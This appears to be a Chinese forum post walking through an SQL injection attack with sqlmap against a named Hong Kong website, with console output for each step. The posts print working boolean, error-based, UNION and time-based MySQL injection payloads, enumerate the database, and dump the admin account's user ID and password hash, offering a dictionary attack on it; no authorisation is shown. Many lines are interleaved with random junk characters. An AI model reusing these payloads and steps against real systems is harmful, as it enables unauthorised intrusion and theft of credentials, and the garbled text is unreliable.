sqlmap实例注入mysql

admin

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 ^' H6 X9 m4 r) wms "Mysql" --current-user       /*  注解：获取当前用户名称
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
. P7 c8 h& L5 c8 b/ ?& N7 }[16:53:54] [INFO] resuming injection data from session file
& ?: d; w* g% j' c[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 |: t2 {0 e1 M* A; Z, k. D0 bsts:
8 ?! ^# L- o, p) E% R. d* ]5 g---
  ^% s% ^6 z( H1 ~. cPlace: GET
+ R5 Y9 }, y; Q4 p1 ]# z: ~9 p1 LParameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
! g. i; \. E9 `- n; u    Type: error-based
5 N: A1 H% v- I' R. ]* p    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
8 r( A3 z7 G, i) L2 ~* \# S),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
- W1 B! R* Q* X8 @+ i    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
! a7 G) ^7 P' D* `/ T- U1 ]( f$ H(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
% p4 _! }# f: @0 V; e! J    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
& s2 Y$ Z) u2 P  z( Y---
; O) o1 l2 D( C/ @5 J[16:53:55] [INFO] the back-end DBMS is MySQL
0 s+ `7 ]: @5 A( Mweb server operating system: Windows
$ K' H( f8 {3 e* z0 K6 F' {+ A2 ]web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
6 _" C+ t4 }- Z6 }: Kcurrent user:    'root@localhost'   
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'

shutting down at: 16:53:58
9 _  U- p% y2 _: l
( c' q  b# H7 N7 F: Y/ bD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
! H. _4 K! e  m: R3 j! Bms "Mysql" --current-db                  /*当前数据库
    sqlmap/0.9 - automatic SQL injection and database takeover tool
1 z/ S/ O# j; v" S# C    http://sqlmap.sourceforge.net

starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
4 z, Q" y0 R0 f9 K2 C: ?- B session file
3 H" ~5 L: K1 t[16:54:16] [INFO] resuming injection data from session file
1 |7 i3 V' H4 y3 c[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
  D$ ]% `3 `& R5 Gsts:
5 p5 n  _  b( _0 F& V, u---
Place: GET
4 t8 w# j+ q2 D; X4 t# PParameter: id
6 O& P/ t8 Z6 N# C0 ^, H5 z8 K    Type: boolean-based blind
% S1 d- j0 }* |0 F! J    Title: AND boolean-based blind - WHERE or HAVING clause
% R2 U$ Z! I$ a5 ^# Y$ b2 M. u6 w    Payload: id=276 AND 799=799
7 |7 }* \; G; p6 y- j2 R1 [$ u    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 V/ L1 m) A9 @5 `),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
5 q) o% _5 p7 h" M' l    Type: UNION query
+ G  A5 V1 P& ^    Title: MySQL UNION query (NULL) - 1 to 10 columns
( d# t5 G5 E7 K2 B    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 S$ I. W. e4 p2 o# Y+ u- o(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
, D7 `0 w3 ~  H9 a, c! ~: {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
  T( t8 l6 F5 P% ^$ t    Title: MySQL > 5.0.11 AND time-based blind
" V1 C+ s- h) ~. o6 z    Payload: id=276 AND SLEEP(5)
---
" E# R" _* ^4 E1 }# O[16:54:17] [INFO] the back-end DBMS is MySQL
9 M# ?6 p5 s' U$ w8 `: X3 e: L" Zweb server operating system: Windows
; Y3 K7 R7 b& v* a& d" f: Uweb application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
  k4 R. B* R6 m8 Gcurrent database:    'wepost'
# G' U; u% ?7 [/ q8 ^* y- O7 @[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'

shutting down at: 16:54:18
1 a( h' z& Y) N& m0 P7 OD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
9 z" ?/ S( f$ y+ ~7 X1 m    http://sqlmap.sourceforge.net

starting at: 16:55:25
2 p2 n: _, d, I+ Z[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
$ i9 q6 m$ [1 |5 x4 g+ E3 N[16:55:25] [INFO] resuming injection data from session file
( T3 q7 J/ s0 n0 t! k[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  d) d$ K  @0 c[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
9 p: R' o# I- ]5 eParameter: id
8 b, E+ P8 P. s) U7 b, Q4 E    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
! C' u7 N! F$ k) s( `3 ^    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- b, J  h: W. C- \6 g+ X120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- C# u& K! A  r# u& g),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
* p4 ~! i, ]9 l    Type: UNION query
* Q( }2 M3 B  P; }, Z    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
/ O4 x4 e( c. g$ G1 ~$ g1 V6 j    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
8 q* M9 H5 e6 S! H2 q8 i[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
1 d: d) G7 i2 C, D# _web application technology: Apache 2.2.11, PHP 5.3.0
" g5 [6 `) N) y& ]1 V) A3 Xback-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
4 C; P7 p. D0 i4 N[6 tables]
2 z+ ~9 [) @$ W9 Z3 h+-------------+
| admin       |
| article     |
  y# K1 m# ~! C$ q% x| contributor |
4 L8 p- \6 s- B& ]| idea        |
| image       |
+ X: C/ L) T9 V$ a2 p; D3 J6 f/ S| issue       |
+-------------+
' ~( ]( a$ N9 s7 p. S  n, @$ H[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk'

shutting down at: 16:55:33
2 i* s  p  v& A
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: Z% j  a: k/ f* xms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
7 s' P- e* P, x# S' I---
( w' H; V, [$ O8 ?: c" N* A9 fPlace: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
$ B% ?. R3 a# z5 Z- O) M- J- a# e    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
4 `4 s+ ]1 a* A' O! A+ w2 F    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
" H5 e% k1 ~% ?1 p8 t1 r),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
7 v6 f( j1 {7 k1 S+ l0 i- ^0 ^9 l    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
; N5 T: a) Y1 f(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
) x3 f: w# M! y# ^9 U* a, e    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
% [, L# v7 Q% z* Sweb server operating system: Windows
  z; |6 q$ W. p" {3 tweb application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
3 [* A( x8 [3 e( Z* h! w7 }+ c[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
5 Z. |7 A- ?  @& Wssion': wepost, wepost
; O% Z8 Z' ]) ~' e' P, [Database: wepost
" I/ x) N1 l- G- x% D2 L" hTable: admin
5 k0 A/ Z0 ?5 l8 l1 F6 j- N; X[4 columns]
; j/ {5 S7 ~0 T8 n4 {- N+----------+-------------+
) h+ L- c$ a  q# [6 F4 o| Column   | Type        |
+----------+-------------+
6 D* I7 e+ {  M4 h; ^! d& C0 ~| id       | int(11)     |
/ w/ r1 F' n2 j| password | varchar(32) |
, t0 U% f/ ]4 B0 l| type     | varchar(10) |
/ e$ q2 q0 g; T, S1 Y| userid   | varchar(20) |
+----------+-------------+
7 t  \- r  c0 D8 l+ j) a

shutting down at: 16:56:19

$ H& Q6 T3 I9 @+ q# P9 QD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ B  c% ?0 |* ]) F: pms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
/ s; V. e/ r4 g$ H9 W0 t6 d" ^    sqlmap/0.9 - automatic SQL injection and database takeover tool
# W8 ?: q' b4 [  |1 U/ t' Z    http://sqlmap.sourceforge.net

starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
, N. u. X7 q& l, Y8 [5 q4 H---
8 Y& S( N, D/ C, z4 PPlace: GET
& q9 D6 c% \+ N) r' w8 KParameter: id
3 F0 ^- U. @/ i    Type: boolean-based blind
5 j; ~3 O1 U( q0 X    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; j' {4 Q' Z  k0 @$ l+ I),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
, t+ {$ B8 s! V9 W- Q. D' W2 W+ @    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
# F6 Z% U) u4 b% r' ~    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
: Q: n* R( l( v( S8 |CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
! q" v9 {5 C* ^: @* ?5 D6 Fweb server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
7 x' f: Z' d- v+ U! ~4 i8 K/ Y8 ?' ?back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
% Z# e6 V9 |" C; Q$ F7 Jn retrieved table items? [Y/n/q] y
$ o, d8 U0 p' A+ w* b! e1 wwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
3 v! |6 u+ h  sDatabase: wepost
' J8 \# |# Q( S: J$ ^Table: admin
1 `% m3 g3 c" t7 A[1 entry]
+----------------------------------+------------+
+ \6 i4 N$ E5 T. B| password                         | userid     |
8 m# A2 i) r6 F+ f+----------------------------------+------------+
- i9 X1 p7 I5 d9 u. v| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
# B6 R: [2 K/ n- y$ H/ ~+ T2 I+----------------------------------+------------+
/ Z, Q8 m$ f- ]- O1 t# e% k( L1 K

shutting down at: 16:58:14
! Z, @5 n  Q" `7 a9 I3 C: K  l
D:\Python27\sqlmap>